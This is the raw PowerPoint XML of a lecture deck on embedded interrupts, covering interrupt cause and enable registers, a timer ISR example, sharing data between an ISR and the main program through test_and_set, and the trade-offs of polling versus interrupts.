              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every bit in the ICR represents an interrupt cause. It is set by the peripheral when the event occurs and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>cleared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> when the CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>sets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> it to acknowledge the interrupt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In other words, value of the interrupt line is asserted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>iff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (IER &amp; ICR) != 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28274720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en-US" smtClean="0"/>
              <a:t>ISR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243"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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_Interrupt1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> TimerInterruptHandler()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	UINT32 icr = _lr(TIMER_ICR) &amp; _lr(TIMER_IER);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	_sr(icr, TIMER_ICR); // acknowledge the interrupt</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TIMER_INT_CAUSE_TIMER_EXPIRED)</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TIMER_INT_CAUSE_TIMER_ERROR)</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6753653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lang="en-US" smtClean="0"/>
              <a:t>Read the ICR once!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267"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_Interrupt1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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TimerInterruptHandler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UINT32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(TIMER_ICR) &amp;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(TIMER_IER);</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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(TIMER_ICR) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, TIMER_ICR); // acknowledge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TIMER_INT_CAUSE_TIMER_EXPIRED)</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TIMER_INT_CAUSE_TIMER_ERROR)</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
        <p:nvSpPr>
          <p:cNvPr id="132100" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7222435" y="3657600"/>
            <a:ext cx="1905000" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -334714"/>
              <a:gd name="adj2" fmla="val -116462"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An interrupt that occurs here might be missed!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43523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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132100"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Data Sharing between ISR and main program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117763" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752600"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ISR is a separate context – need to protect shared data to avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>race conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Like a special thread with the highest priority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Several alternatives:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Disable interrupts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  before the critical section (in the main program), enable afterwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use processor’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>test_and_set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> capability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When an OS is present, use OS constructs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In any case the ISR should never “block” until an event occurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3335736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Test and Set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Test_and_set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is a processor instruction performing the following logic:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Test_and_set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>temp=*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>return temp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4343400"/>
            <a:ext cx="4648200" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="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mainCode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test_and_set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(&amp;global)==1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    // continue</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
        <p:nvSpPr>
          <p:cNvPr id="15365" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="4343400"/>
            <a:ext cx="2590800" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="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ISR()</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global = 0;</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9957565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en-US" dirty="0" smtClean="0"/>
              <a:t>Using Polling vs. Interrupts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Polling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is the act of repeatedly querying the status of an event</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3124200"/>
            <a:ext cx="4343400" cy="650875"/>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while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(!_lr(DEVICE_READY_REG))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3962400"/>
            <a:ext cx="8229600" cy="10668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r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>As opposed to continuing with the main flow and then acting on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>interrupt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> when the event occurs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9539475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838200" y="762000"/>
            <a:ext cx="7620000" cy="2586038"/>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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> CryptoEncryptBuffer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buf,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len,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key,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out_buf)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	// start crypto operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	CryptoProgramHardware (buf, len, key, out_buf);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	// wait for completion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while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (!CryptoIsReady())</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3657600"/>
            <a:ext cx="7620000" cy="2586038"/>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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> CryptoEncryptBuffer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buf,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len,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key,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out_buf)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	// start crypto operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	CryptoProgramHardware (buf, len, key, out_buf);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	// wait for completion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	// Event signaled by ISR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	OsWaitEvent(&amp;CryptoCompletionEvent);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="18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42509576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smtClean="0"/>
              <a:t>Using Polling vs. Interrupts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Polling keeps the CPU busy while it could be doing something else </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>is there always something else to do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Interrupt usage is more complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Interrupt has overhead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>interrupt latency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>context switches</a:t>
